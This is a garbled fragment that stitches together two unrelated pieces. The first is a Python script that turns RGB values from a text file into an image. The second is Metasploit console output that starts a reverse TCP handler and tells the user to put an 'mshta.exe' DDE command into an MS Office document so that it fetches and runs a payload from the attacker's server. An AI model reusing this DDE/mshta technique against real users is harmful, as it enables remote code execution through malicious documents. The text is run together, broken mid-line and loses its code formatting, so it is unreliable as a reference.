from PIL import Image import re x = 887 y = 150 image = Image.new("RGB",(x,y)) f = open('ce.txt') for i inrange(0,x): for j inrange(0,y): l = f.readline() r = l.split(", ") image.putpixel((i,j),(int(r[0]),int(r[1]),int(r[2]))) image.save('image1.jpg')
Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)
[-] Handler failed to bind to 192.168.1.1:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Using URL: http://0.0.0.0:8080/1 [*] Local IP: http://192.168.114.128:8080/1 [*] Server started. [*] Place the following DDE in an MS document: mshta.exe "http://192.168.1.1:8080/1